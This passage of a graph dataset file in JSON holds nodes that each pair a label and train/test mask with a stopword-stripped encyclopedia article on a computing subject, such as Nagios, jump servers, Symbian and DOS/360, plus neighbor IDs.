      9320,
      8821,
      3705,
      7292,
      9345,
      5255,
      6791,
      7816,
      6795,
      6797,
      5262,
      9871,
      6800,
      11408,
      10387,
      8854,
      10393,
      8858,
      155,
      7326,
      7841,
      1698,
      4777,
      7347,
      5816,
      5311,
      7359,
      7871,
      196,
      3269,
      3782,
      5833,
      10445,
      7889,
      3795,
      1240,
      8923,
      8413,
      9949,
      6367,
      228,
      10470,
      236,
      10991,
      9970,
      7926,
      3836,
      2304,
      5892,
      8455,
      1802,
      10009,
      10525,
      798,
      8990,
      288,
      803,
      3876,
      4901,
      5413,
      7983,
      823,
      4920,
      5431,
      2875,
      10045,
      11590,
      11592,
      8524,
      9039,
      3409,
      339,
      9560,
      9561,
      6502,
      11625,
      8554,
      5483,
      3960,
      7548,
      1409,
      4995,
      8068,
      3462,
      8582,
      9610,
      1931,
      5522,
      1427,
      5524,
      10645,
      1435,
      6555,
      8605,
      2978,
      1959,
      5031,
      3499,
      7595,
      6062,
      438,
      6074,
      1470,
      8644,
      5067,
      4044,
      4048,
      11219,
      2519,
      4056,
      477,
      482,
      6632,
      8680,
      9195,
      5100,
      5101,
      5612,
      9712,
      10739,
      10744,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 1204,
    "label": 3,
    "text": "Soul_of_a_Robot:soul robot soul robot computer game sequel nonterraqueous zx spectrum amstrad cpc msx released mastertronic 1985 sometimes called nonterraqueous 2 attempt destroy rogue computer nonterraqueous failed computer threatens self-destruct old age taking planet nonterraqueous people planet create another robot one mind man kamikaze mission computer core must locate three keys allow transport next section self-destructing inside computer core gameplay rather different prequel nonterraqueous robot controlled player fly like previous game leaps rather like ordinary platform game however ability fly available game necessary complete robot still psyche value must allowed decrease zero decreases certain actions laser previous game also remains game considered much difficult prequel relying perfectly timed aimed jumps player able choose five strengths jump order progress enjoyed much less commercial success gameplay much slower jumps flying take lot time effort perform correctly also seems certain influence underwurlde gameplay sounds used game soul robot also much smaller game map containing third many individual screens prequel 256 rooms",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1205,
    "label": 3,
    "text": "Chen_Tze-chiang:chen tze-chiang dr. chen tze-chiang t. c. chen joined ibm thomas j. watson research center 1984 currently ibm fellow vice president science technology thomas j. watson research center ibm research division yorktown heights new york period feb. 1999 feb. 2003 dr. chen director advanced logic/memory technology development semiconductor research development center ibm microelectronics division east fishkill new york period 1992-1999 senior manager responsible 64mb/256mb/1gb dram technology development ibm/siemens/toshiba dram development alliance assuming role project manager dram development held variety managerial assignments career ibm including functional manager high-performance bicmos technology manufacturing engineering manager bipolar vlsi line manager optical lithography development watson research center dr. chen born taiwan 1951 received b.sc m.s degrees physics national cheng kung university taiwan 1974 1976 respectively m.s ph.d degrees electrical engineering yale university 1979 1985 respectively published 60 papers technical journals conferences contributions advanced bipolar technology major impact ibm s/390 mainframe systems recently contributions cmos miniaturization dram devices profound impact ibm ’ leadership cmos process technology dram manufacturing dr. chen elected fellow institute electrical electronics engineers ieee 1999 contributions silicon bipolar dram technology development dr.chen recognized several ibm technical innovation awards named ibm distinguished engineer ibm fellow 1996 1999 respectively 2011 received ieee ernst weber managerial leadership award",
    "neighbors": [
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 1206,
    "label": 8,
    "text": "Rewrite_engine:rewrite engine rewrite engine software component performs rewriting uniform resource locators modifying appearance modification called url rewriting way implementing url mapping routing within web application engine typically component web server web application framework rewritten urls sometimes known short pretty fancy urls search engine friendly sef urls slugs used provide shorter relevant-looking links web pages technique adds layer abstraction files used generate web page url presented outside world web sites dynamic content use urls generate pages server using query string parameters often rewritten resemble urls static pages site subdirectory hierarchy example url wiki page might rewritten blog might url encodes dates entry altered like also allows user change url see postings available december simply removing text encoding day '19 though navigating directory site pass specialized terms url search engine search term would allow users search directly browser example url entered browser location bar urlencoded browser makes http request server could rewrite several benefits using url rewriting however drawbacks well user wants modify url retrieve new data url rewriting may hinder construction custom queries due lack named variables example may difficult determine date following format case original query string useful since query variables indicated month day many web frameworks include url rewriting either directly extension modules software development perspective url rewriting aid code modularization control flow making useful feature modern web frameworks",
    "neighbors": [
      225,
      865,
      3237,
      9125,
      7370,
      5677,
      10815,
      10579,
      9941,
      4439,
      8350,
      8639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1207,
    "label": 9,
    "text": "EICASLAB:eicaslab eicaslab software suite providing laboratory automatic control design time-series forecasting developed final output european acoduasis project ips-2001-42068 funded european community within innovation programme project lifetime aimed delivering robotic field scientific breakthrough new methodology automatic control design facilitate knowledge transfer eicaslab equipped “ automated algorithm code generation ” software engine allows obtain control algorithm algorithm even without deep knowledge theory methodology otherwise normally required traditional control design methodologies eicaslab actually adopted european research projects dealing robotics arflex ist-nmp2-016880 pisa project nmp2-ct-2006-026697 automotive hi-ceps project tip5-ct-2006-031373 ersec project fp7 247955 eicaslab used european industries research institutes academia design control systems time series forecasting documented scientific technical literature eicaslab includes tools modelling plants designing testing embedded control systems assisting phases design process control strategy system concept generation control software code final target eicaslab software suite composed main program called master able assist manage control design steps means set tools respectively eicaslab includes following features support system concept hardware architectures including multi-processors software architectures including multi-level hierarchical control considered control software subdivided functions allocated designer different processors control function sampling frequency time window execution scheduled designer means eicaslab scheduler data exchanged among control functions allocated processor among different processors belonging plant control system delay time data transmission considered final “ application software ” generated c subdivided files one related specific processor eicaslab includes specific working areas developing optimizing testing algorithms software related “ plant controller ” including “ automatic control ” “ trajectory generation ” disturbances acting plant perform task three different working areas available follows eicaslab includes following tools features support control algorithm design automatic algorithm generation tool starting “ plant simplified model ” control required performance generates control algorithm basis plant design data applied control design methodology allows design controllers guaranteed performance without requiring tuning field spite unavoidable uncertainty always exists mathematical model built basis plant design data plant actual performance fundamentals control presence uncertainty see designer choose among three control basic schemes one option selecting control algorithms different level complexity synthesis automatically generated control performed resultant three actions plant state observer task may extended estimate predict disturbance acting plant plant disturbance prediction compensation original control feature allows significant reduction control error model parameter identification tool allows identification appropriate values simplified model parameters recorded experimental data simulated trials performed using “ plant fine model ” parameter true value exist model approximated description plant parameter best value depends cost function adopted evaluate difference model plant identification method estimates best values simplified model parameters point view closed loop control design control parameter optimization tool performs control parameter tuning simulated environment optimization performed numerically predefined simulated trial given mission host command sequence disturbance acting plant potential event related plant performance given functional cost associated plant control performance eicaslab automatic code generation tool provides ansi c source code related control algorithm developed final result designer work “ application software ” ansi c debugged tested ready compiled linked plant control processors “ application software ” includes software related “ automatic control ” “ trajectory generation ” functions simulated control functions strictly one designer transfer field actual plant controller eicaslab includes following tools support control tuning slow motion view tool used phase setting plant control providing variable variable analysis control software performance experimental trials performed means actual plant plant input output host commands sent controller recorded experimental trials processed eicaslab follows recorded plant input output variables used plant area inside input output variables obtained plant simulation recorded host commands used control mission area inside host command generated control mission function simulated trial performed control function receives recorded outputs actual plant related recorded host commands inside simulated ones control function running eicaslab strictly one running actual plant controller commands resulting simulated control function sent simulated control simulated plant strictly recorded plant inputs unless numerical errors depending differences processor eicaslab running one used actual plant controller experience shown effects differences negligible recorded experimental trial performed actual plant controller completely repeated eicaslab difference process performed slow-motion useful step step using debugger program automatic code generation tool used insert controller code linux real-time operating system rtos two available versions namely linux rtai linux rt kernel preemption order test control algorithm pc environment instead final target hardware performing rapid control prototyping rcp tests eicaslab rcp includes real-time scheduler based multithreading programming techniques able run multi-core processor automatic code generation tool used insert controller code final hardware target performed operation hardware loop hil tests may performed consisting piloting – instead actual plant plant simulated eicaslab running pc suitable configured connected necessary hardware interfaces final hardware target",
    "neighbors": [
      2691,
      7814,
      7983,
      10675,
      9366,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1208,
    "label": 4,
    "text": "Jump_server:jump server jump server jump host jumpbox computer network used access manage devices separate security zone common example managing host dmz trusted networks computers jump server hardened monitored device spans two dissimilar security zones provides controlled means access user access tightly controlled monitored 1990s co-location facilities became common need provide access dissimilar security zones jump server concept emerged meet need jump server would span two networks typically used conjunction proxy service socks provide access administrative desktop managed device ssh tunneling became common jump servers became de facto method access jump servers typically placed secure zone dmz provide transparent management devices dmz management session established jump server acts single audit point traffic also single place user accounts managed prospective administrator must log jump server order gain access dmz assets access logged later audit typical configuration hardened unix unix-like machine configured ssh local firewall administrator connects target machine dmz making ssh connection administrator personal computer jump server using ssh forwarding access target machine using ssh tunnel target host allows use insecure protocols manage servers without creating special firewall rules exposing traffic inside network typical configuration windows server running remote desktop services administrators connect isolates secure infrastructure configuration administrator workstation jump server potential risk network design several ways improving security jump server including high level risk jump server represent vpn may suitable higher security replacement",
    "neighbors": [
      10341,
      8998,
      5608,
      9868,
      11244,
      11502,
      11188,
      5397,
      4725,
      5749,
      5405
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1209,
    "label": 8,
    "text": "BiZZdesign_Enterprise_Studio:bizzdesign enterprise studio bizzdesign enterprise studio formerly bizzdesign architect visual modeling design tool enterprise architecture supports application archimate togaf well enterprise architecture frameworks platform supports modelling visualisation analysis documentation enterprise architecture different viewpoints multiple views additionally supports modeling business goals requirements also supports automatic data collection import data office applications bizzdesign enterprise studio developed bizzdesign first released 2004 bizzdesign architect development based results archimate project intends offer high value enterprise architecture modelling tool business management control 2012 recognized gartner forrester research one leading enterprise architecture tools support enterprise architecture frameworks related frameworks besides architecture frameworks tool also native support interoperability",
    "neighbors": [
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 1210,
    "label": 9,
    "text": "JFugue:jfugue jfugue open source programming library allows one program music java programming language without complexities midi first released 2002 david koelle current version jfugue 5.0 released march 2015 brian eubanks described jfugue useful applications need quick easy way play music generate midi files jfugue free software released apache license example java program play c-major scale jfugue string passed jfugue contains series musical instructions jfugue parses turns musical events default rendered midi format called staccato represent musical features midi specifically designed easy people read write default use case jfugue convert staccato midi architecture allows read write musical information variety formats e.g. midi musicxml staccato lilypond example converting midi file staccato format jfugue 5.0 contains set classes represent ideas music theory including intervals scales chords chord progressions notion patterns integral jfugue patterns used represent phrases music combined repeated altered using tools aware musical content pattern jfugue 5.0 makes extensive use fluent interfaces also known method chaining lets developers write short expressive pieces code like following jfugue capable producing microtonal music using staccato element consisting letter 'm followed frequency hertz desired tone like notes jfugue tone may followed duration w whole note q quarter note note dynamics e.g. note note velocities jfugue converts microtone frequency sequence midi pitch wheel note events achieve desired tone jfugue provides intuitive programming interface creating beats rhythms characters strings correspond percussion note played percussive midi channel tenth channel default settings provided common sounds e.g. bass_drum q although java map character string may passed rhythm constructor addition allowing music converted one music format another architecture jfugue used create programmatic tools capable performing computations incoming music format changing incoming music example simple tool keeps track instruments used musical piece jfugue provides functionality top java midi transmitter receiver classes reduce amount code developer would need write connect external midi devices jfugue used number applications including software projects artistic installations jfugue used play music software build fails succeeds jfugue one java libraries lets one something interesting little one two lines code distinction earned jfugue place book groovy action",
    "neighbors": [
      5537,
      9210
    ],
    "mask": "None"
  },
  {
    "node_id": 1211,
    "label": 4,
    "text": "Nagios:nagios nagios known nagios core free open source computer-software application monitors systems networks infrastructure nagios offers monitoring alerting services servers switches applications services alerts users things go wrong alerts second time problem resolved ethan galstad group developers originally wrote nagios netsaint actively maintain official unofficial plugins nagios recursive acronym nagios ai n't gon na insist sainthood – sainthood makes reference original name netsaint changed response legal challenge owners similar trademark agios hagios also transliterates greek word άγιος means saint nagios originally designed run linux also runs well unix variants free software licensed terms gnu general public license version 2 published free software foundation nagios core open source software licensed gnu gpl v2 currently provides nagios remote plugin executor nrpe nagios agent allows remote system monitoring using scripts hosted remote systems allows monitoring resources disk usage system load number users currently logged nagios periodically polls agent remote system using codice_1 plugin nrpe allows remotely execute nagios plugins linux/unix machines allows monitor remote machine metrics disk usage cpu load etc. nrpe also communicate windows agent add-ons execute scripts check metrics remote windows machines well nagios remote data processor nrdp nagios agent flexible data transport mechanism processor designed architecture allows easily extended customized nrdp uses standard ports protocols http xml implemented replacement nagios service check acceptor nsca program mainly used monitor windows machines installed remote system nsclient++ listens port tcp 12489 nagios plugin used collect information addon called codice_2 nrpe nsclient++ allows monitor so-called 'private services memory usage cpu load disk usage running processes etc nagios host service monitor designed inform network problems nagios cross platform agent open source project maintained nagios enterprises ncpa installs windows linux mac os x created scale-able api allows flexibility simplicity monitoring hosts ncpa allows multiple checks memory usage cpu usage disk usage processes services network usage active checks queried api ncpa listener service passive checks sent via ncpa passive service md ilyous nagios xi extended interface config manager toolkit using nagios core back-end written maintained original author ethan galstad nagios enterprises enterprise-class application monitors systems networks infrastructure offers extensive user interface configuration editor advanced reporting monitoring wizards extensible front-end back-end along many additions nagios core centos rhel currently supported operating systems combines nagios core technologies main database ndoutils module used alongside nagios core use mysql prior xi 5 postgresql used one three databases uses longer used new installs nagios xi front-end nagios core mainly cgi php nagios xi front-end back-end written php including subsystem event handlers notifications python used create capacity planning reports reports rrdtool highcharts included create customizable graphs displayed dashboards 16 january 2014 nagios enterprises redirected nagios-plugins.org domain web server controlled nagios enterprises without explicitly notifying nagios plugins community team consequences actions nagios enterprises replaced nagios-plugins team group new different members community team members replaced continued work name monitoring plugins along new website new domain monitoring-plugins.org",
    "neighbors": [
      8582,
      6797,
      3218,
      5139,
      3993,
      5402,
      7453,
      9245,
      5800,
      3629,
      7983,
      2485,
      9909,
      823,
      1211,
      4797,
      3007,
      8384,
      4033,
      7364,
      8644,
      7882,
      6993,
      6482,
      11221,
      8539,
      6620,
      2014,
      10462,
      10341,
      8554,
      3692,
      5612,
      7022,
      9455,
      1776,
      5492,
      6523,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1212,
    "label": 6,
    "text": "StorNext_File_System:stornext file system stornext file system snfs colloquially referred stornext shared disk file system made quantum corporation stornext enables multiple windows linux apple workstations access shared block storage fibre channel network stornext file system installed computers read write storage volume time enabling known file-locking san stornext used environments large files must shared accessed simultaneously users without network delays file must available access multiple readers starting different times common use cases include multiple video editor environments feature film television general video post production original name stornext centravision file system cvfs created mountaingate imaging systems corporation provide fast data transfer windows sgi irix computers advanced digital information corporation acquired mountaingate september 1999 added additional client types changed name stornext file system first new clients solaris linux august 2006 quantum acquired adic stornext software hardware elements front end filesystem managed usually two metadata controllers primary failover metadata appliance mdc act traffic director block-level filesystem data-overhead typically associated nas configured network shares fibre channel connectivity key element stornext filesystem implementations often referred production san production storage workspace verticals oil gas infiniband connectivity sometimes used client systems required run operating system access shared filesystem containing stornext data january 2008 operating systems available client software microsoft windows macos xsan developed apple red hat linux suse linux hp-ux solaris aix irix client systems attached either directly san via ip gateway called dlc distributed lan controller two dlcs configured failover and/or load balancing dlc ip based protocol customized data traffic making efficient higher performance traditional nas environments users also used dlc infrastructure enable lower performance file sharing via nfs cifs using three capabilities customers create three tiers front-end client performance san native dlc nas leveraging common file sharing architecture quantum offers customers two choices hardware infrastructure stornext customized configurations using stornext software independently selected hardware use stornext appliances production systems set pre-configured solutions quantum said optimized particular use cases 4k editing latter solutions include embedded technical support common application television feature film post-production many multiple editors access set video data non-destructively stornext also leveraged high end motion geoscience imagery commercial public sector use cases high density forensic data cybersecurity colloquially stornext file system known 'stornext entire stornext product actually combination two technologies stornext file system optional stornext storage manager stornext storage manager policy based data management system copy migrate and/or archive data stornext file system variety storage devices multiple locations data tiered disk quantum lattus object store robotic tape library even exported offline vault regardless data resides maintained single namespace customers typically use capability three use cases media customers use storage manager policy tiering capability enable extension primary disk storage object storage high performance tape introduction lattus-m object storage 2013 quantum introduced capability archive data durably greater 11 9s disk high throughput lattus-m disk controller support 3 gbit/s single streaming performance video large files controllers scaled horizontally add performance required made combination stornext lattus-m attractive use cases rapid restore video motion imagery content distribution many customers also use storage manager create granular efficient data protection many versions policy-selected files copied second data location media without need time resource consuming 'file-walker avoiding pain backup finally administrators use storage manager hsm migrating data tiers particularly tape cost effective archive tapes created storage manager optionally written lto industry standard format ltfs enable easy interchange",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      9353,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      1712,
      7344,
      2230,
      5816,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      1304,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      10051,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1213,
    "label": 2,
    "text": "Pilot_(operating_system):pilot operating system pilot single-user multitasking operating system designed xerox parc early 1977 pilot written mesa programming language totalling 24,000 lines code pilot designed single user system highly networked environment pilot systems interfaces designed inter-process communication ipc across network via pilot stream interface pilot combined virtual memory file storage one subsystem used manager/kernel architecture managing system resources designers considered non-preemptive multitasking model later chose preemptive run blocked system based monitors pilot included debugger co-pilot could debug frozen snapshot operating system written disk typical pilot workstation ran 3 operating systems 3 different disk volumes co-co-pilot backup debugger case main operating system crashed co-pilot main operating system running co-co-pilot used compile bind programs inferior copy pilot running 3rd disk volume could booted run test programs might crash main development environment debugger written read write variables program stored separate disk volume architecture unique allowed developer single-step even operating system code semaphore locks stored inferior disk volume however memory source code d-series xerox processors grew time checkpoint restore operating system known world swap grew high could take 60-120 seconds run one line code inferior operating system environment eventually co-resident debugger developed take place co-pilot pilot used operating system xerox star workstation",
    "neighbors": [
      2179,
      8262,
      2345,
      7983,
      6675,
      11539,
      7158
    ],
    "mask": "None"
  },
  {
    "node_id": 1214,
    "label": 0,
    "text": "Lexical_simplification:lexical simplification lexical simplification sub-task text simplification defined lexical substitution task reduce text complexity",
    "neighbors": [
      1890,
      10231,
      5781,
      887
    ],
    "mask": "Test"
  },
  {
    "node_id": 1215,
    "label": 1,
    "text": "4th_Dimension_(software):4th dimension software 4d 4th dimension silver surfer known early development relational database management system ide developed laurent ribardière 4d created 1984 slightly delayed public release macintosh 1987 programming language 4d product line since expanded sql back-end integrated compiler integration php several productivity plug-ins interfaces plug-ins created 4d include 4d write word processor 4d view somewhat like spreadsheet extra functionality 4d internet commands let add sorts internet related functionality database also 100 third-party plugins free commercial 4d also used web server run compiled database applications today 4d published french company 4d sas sales distribution support presence major markets united states united kingdom france primary markets product localized dozen languages including english french german japanese czech hebrew arabic korean persian silver surfer known early development developed laurent ribardière 1984 following negotiations ribardiere planned apple inc. formerly apple computer inc would publish software apple canceled plan reportedly due pressure potential database publishers claimed apple 'brand database 3rd party products would disadvantaged marketplace apple tried time ensure well known software publishers supported macintosh platform result project reverted laurent ribardière french businesswoman marylene delbourg-delphis published 4th dimension although independently published apple supported new venture used 4d extensively throughout organization projects including fitness center management cim computer integrated manufacturing number apple personnel became 4d experts including lance mcandrew apple cupertino headquarters andrew o'donoghue apple irish based european manufacturing headquarters 4th dimension application managed entire european service center administration next years 4th dimension installed base grew publisher aci established us-based subsidiary acius initially led guy kawasaki 16 years operating acius 2000 name officially changed 4d inc 1993 4d server v1.1 client/server version 4th dimension introduced along release 4th dimension v3.1 1995 4d v3.5 went cross-platform since supported microsoft windows apple macintosh operating systems 1997 4d v6 first version 4d contain fully integrated web server allowing developers translate 4d forms html fly using 4d language 2004 4d 2004 first version 4d allow developers create standalone client/server web service oriented applications soa without changing code 2008 4d v11 added sql layer 4d database engine extending native sql 4d programming language allowed 4d developers write native sql code connect either local remote servers 2010 4d v12 integrated ability execute php functions/scripts within 4d programming language version also supported new replication synchronization commands included 64 bit version 4d server 4d application run either standalone mode client-server mode standalone mode 4d application 4d.exe windows 4d.app mac used open structure file 4db/4dc file directly along associated data file 4dd client-server paradigm 4d server application 4dserver.exe windows 4dserver.app mac used open structure file 4db/4dc file directly along associated data file 4dd 4d may used remote mode connect 4d server 4d two applications 4d 4d server 4d server runs server 4d run either standalone remote mode 4d run two modes 4d single-user mode allows 1 person run application 4d remote mode used connecting 4d server 4d server used client-server connectivity application mode 4d server loads structure file 4db 4dc also datafile 4dd provides network access 4d remote workstation dynamically updated cache resources working 4d server maintains data code section include syntax examples demonstrating different programming constructs used 4d loops variable usage 4d fields variables expressions following data types info 4d data type found 4d data types documentation page local variables prefixed codice_1 like codice_2 live duration method process variables prefix like codice_3 live throughout duration process inter-process global variables prefixed codice_4 like codice_5 live throughout duration application use real integer long integer variables well inter-process process local variable counters lengthy repetitive loops especially compiled mode use local long integer variables example following example goes elements two-dimensional array following example builds array pointers date fields present database",
    "neighbors": [
      1952,
      225,
      11171,
      8644,
      8262,
      4042,
      6797,
      10413,
      7983,
      11693,
      7412,
      10389,
      10518,
      4056,
      2045,
      670
    ],
    "mask": "Test"
  },
  {
    "node_id": 1216,
    "label": 2,
    "text": "Symbian_Ltd.:symbian ltd. symbian ltd. software development licensing consortium company known symbian os smartphone operating system related technologies headquarters southwark london england offices opened cambridge sweden silicon valley japan india china south korea australia established 24 june 1998 partnership psion nokia ericsson motorola sony exploit convergence pdas mobile phones joint-effort prevent microsoft extending desktop monopoly mobile devices market ten years day established 24 june 2008 nokia announced intended acquire shares already cost €264 million day symbian foundation announced aim provide royalty-free software accelerate innovation pledged contribution symbian os user interfaces acquisition symbian ltd. nokia completed 2 december 2008 point symbian employees became nokia employees transfer relevant symbian software ltd. leases trademarks domain names nokia symbian foundation completed april 2009 18 july 2009 nokia symbian professional services department transferred symbian foundation sold accenture consulting company symbian ltd. brainchild psion next generation mobile operating system project following 32-bit version epoc psion approached four companies decided work together full software suite including kernel drivers user interface much symbian initial intellectual property came software arm psion symbian ltd developed licensed symbian os operating system advanced mobile phones pdas symbian ltd wanted system different user interface layers unlike microsoft offerings psion originally created several interfaces reference designs would later end pearl smartphone quartz palm-like pda crystal clamshell pda one early design called emerald also ended market ericsson r380 nokia created series 60 pearl series 80 series 90 platforms crystal whilst uiq technology subsidiary symbian ltd. time created uiq quartz another interface moap ntt docomo despite partners symbian ltd different backers interface effectively competing software became prominent point february 2004 uiq focuses pen devices announced foray traditional keyboard devices competing head-on nokia series 60 offering whilst nokia process acquiring psion remaining stake symbian ltd. take overall control company company founder shareholders psion nokia ericsson motorola joined symbian consortium shortly later gaining 23.1 stake nokia ericsson october 1998 matsushita followed may 1999 paying £22 million 8.8 stake followed siemens taking 5 april 2002 samsung also taking 5 february 2003 motorola sold stake company psion nokia september 2003 february 2004 psion originator symbian intended sell 31.1 stake company nokia caused unease amongst shareholders nokia would gain majority control company sony ericsson particular vocal critic deal finalised stake shared nokia matsushita siemens ag sony ericsson july 2004 nokia holding 47.9 share decline symbian ltd. tied nokia fate 2007 enjoyed high level success operating system running one every two mobile phones bearing nokia logo claimed 65 percent mobile market symbian os continued dominate market nokia acquired company entirety 2008 creating independent non-profit organization called symbian foundation nokia donated assets symbian ltd. well nokia s60 platform new entity goal developing open-source royalty-free mobile platform nokia however began lose market share emergence apple iphone android address nokia abandoned symbian os favor windows phone os mobile devices shipping last symbian handset 2013 lost biggest supporter caretaker symbian absorbed accenture supposed maintain 2016 previous symbian foundation transitioned licensing entity permanent staff claiming website responsible specific licensing legal frameworks put place open sourcing platform licensees symbian operating system arima benq fujitsu lenovo matsushita motorola nokia samsung sharp siemens sony ericsson symbian ltd ceo time acquisition nigel clifford previous ceos included david levin left 2005 head united business media plc founding ceo colly myers left company 2002 found issuebits company behind sms information service question answered aqa update symbian link found exist anymore",
    "neighbors": [
      6276,
      9732,
      11271,
      11277,
      7063,
      11545,
      4132,
      1833,
      5290,
      9262,
      7983,
      11184,
      9137,
      5938,
      10802,
      5178,
      1083,
      7617,
      10053,
      199,
      7246,
      5201,
      2259,
      7253,
      6748,
      9443,
      10599,
      6505,
      2925,
      5363
    ],
    "mask": "None"
  },
  {
    "node_id": 1217,
    "label": 7,
    "text": "Salesforce_Marketing_Cloud:salesforce marketing cloud salesforce marketing cloud provider digital marketing automation analytics software services founded 2000 name exacttarget company filed ipo 2007 withdrew filing two years later raised 145 million funding acquired cotweet pardot igodigital keymail marketing 2012 raised 161.5 million initial public offering acquired salesforce 2.5 billion 2013 exacttarget renamed salesforce marketing cloud 2014 acquisition salesforce salesforce marketing cloud founded name exacttarget late 2000 scott dorsey chris baggott peter mccormick 200,000 financing joanna milliken joined exacttarget first employee 2001 raised 10.5 million funding insight venture partners 2004 firm grew 11.5 million second year operations 41.1 million 2006 first profitable year december 2007 exacttarget filed intent initial public offering securities exchange commission withdrew filing may 2009 instead announced 70 million venture funding raised international expansion followed another 75 million round later year office established london acquisition uk-based exacttarget reseller keymail marketing september 2009 company hired 200 additional employees 2010 exacttarget acquired cotweet company founded 2008 develops markets software managing multiple twitter accounts exacttarget went public march 2012 raised 161.5 million funding new york stock exchange late 2012 acquired marketing automation vendor pardot 96 million developers product recommendation engine igodigital 21 million 2012 revenues grew 40 percent preceding year following june exacttarget acquired salesforce.com 2.5 billion months later salesforce.com said laying 200 staff due overlaps exacttarget acquisition september exacttarget connections conference salesforce.com said integrating exacttarget new division called salesforce exacttarget marketing cloud may 2014 scott dorsey stepped ceo exacttarget replaced scott mccorkle company renamed october 2014 salesforce marketing cloud removing exacttarget name part integration salesforce salesforce marketing cloud develops marketing automation analytics software email mobile social online marketing also offers consulting implementation services software sold primarily multi-year subscription basis price subscription based features enabled number users level customer service software interactive marketing hub released 2010 software user interface re-done serves software primary user interface managing communications content different media salesforce marketing cloud software offered hosted online subscription model company owns cotweet pardot igodigital tools mobile features well many workflow collaboration tools released july 2013 salesforce marketing cloud founded email marketing vendor email management software maintains mailing lists schedules modifies email messages based recipients read click-on forward september 2014 company introduced journey builder apps intended create customer lifecycle maps mobile app users month september 2014 exacttarget connections conference announced numerous updates software included integration software products owned salesforce.com buddy media social studio well improvements workflow content management tools november 2014 company released new version social studio release expanded social studio beyond salesforce marketing cloud started integrating service cloud sales cloud enabled sending leads sales cloud — salesperson see full context company social media interactions lead marketing cloud focuses consumers engages across channels order provide personalized experience developing quickly 4 marketing cloud releases per year recent marketing cloud release notes marketing cloud connect integrates data sales cloud app cloud service cloud enable targeted campaigns data entire salesforce ecosystem available inside marketing cloud includes transfer reports objects contacts leads campaigns connector includes features like journey builder integration synchronization segmentations triggered/guided sends make salesforce crm data accessible december 2012 two thirds exacttarget 1,500 employees located indianapolis company hosts annual user conference called salesforce connections previously exacttarget connections event first connections event 2007 attracted 500 attendees since grown one largest conferences digital marketing event located indianapolis 2007 2014 new york city 2015 atlanta 2016 occur 2017 merged world tours brought back chicago 2018 april 28 2016 conference renamed salesforce connections merged salesforce world tour 2017",
    "neighbors": [
      10090
    ],
    "mask": "None"
  },
  {
    "node_id": 1218,
    "label": 5,
    "text": "Distributed_Data_Protocol:distributed data protocol distributed data protocol ddp client-server protocol querying updating server-side database synchronizing updates among clients uses publish-subscribe messaging pattern created use meteor javascript framework ddp specification located github",
    "neighbors": [
      10242,
      3460,
      9225,
      1036,
      11408,
      3610,
      3228,
      10271,
      3105,
      9511,
      9519,
      8758,
      1467,
      6982,
      6855,
      2760,
      1738,
      2892,
      3284,
      4318,
      3812,
      4068,
      6628,
      9572,
      3959,
      7928,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 1219,
    "label": 2,
    "text": "DOS/360_and_successors:dos/360 successors disk operating system/360 also dos/360 simply dos discontinued operating system ibm mainframes announced ibm last day 1964 first delivered june 1966 time dos/360 widely used operating system world tos/360 tape operating system/360 dos called ibm operating system system/360 used early days around 1965 support system/360 model 30 similar platforms tos per tape name required tape drive shared code base manuals ibm dos/360 tos went 14 releases discontinued disks ibm 2311 ibm 2314 became affordable time system/360 whereas expensive luxury ibm 7090 dos/360 primary operating system small midsize s/360 installations dos/vs released 1972 first dos/vs release numbered release 28 signify incremental upgrade dos/360 added virtual memory support new system/370 series hardware used fixed page table mapped single address space 16 megabytes partitions combined dos/vs increased number partitions separate simultaneous programs three named background foreground 1 foreground 2 five bg f1 f4 allowed system wide total fifteen subtasks dos/vs succeeded dos/vse z/vse dos/vse introduced 1979 extended version dos/vs support new 4300 processors 4300 systems included feature called ecps vse provided single-level storage processor i/o channels dos/vse provided support ecps vse could also run system/370 without feature vse last free version dos ssx/vse small system executive attempt ibm simplify purchase installation vse providing pre-generated system containing os popular products ssx released 1982 later replaced vse/sp ssx sold ibm bundle 14 component products advanced functions/vse vse/power acf/vtame vse/vsam cics/dos/vs dos/vs sort/merge vse/iccf vse/occf vse/ipcs dos/cobol back up/restore space management vse/ditto originally would agree offer individual products separately via rpq although ibm later agreed add products individually price list pressure isvs claimed bundling violated antitrust laws 1986 ibm released vse/sp system product conjunction announcement 9370 processors vse/sp replaced ssx/vse bundled vse popular vse program products vse/af acf/vtam cics power/vs vse/sp supported 24-bit addresses despite customer requests provide xa 31 bit version vse/esa 31-bit dos/vse version released 1990 support 384 mb real storage provided twelve static partitions allowed vse/power acf/vtam run private address spaces introduced new feature called dynamic partitions could allow 150 concurrent jobs address space version 1 could run either esa 370 mode esa mode also supporting xa hardware limitations version 2 supported esa mode esa hardware ibm released z/vse 3.1 2005 change naming reflected new system z branding ibm mainframe product line represent fundamental change architecture vse/esa 2.7 preceded particular support new 64-bit z/architecture running 31-bit mode 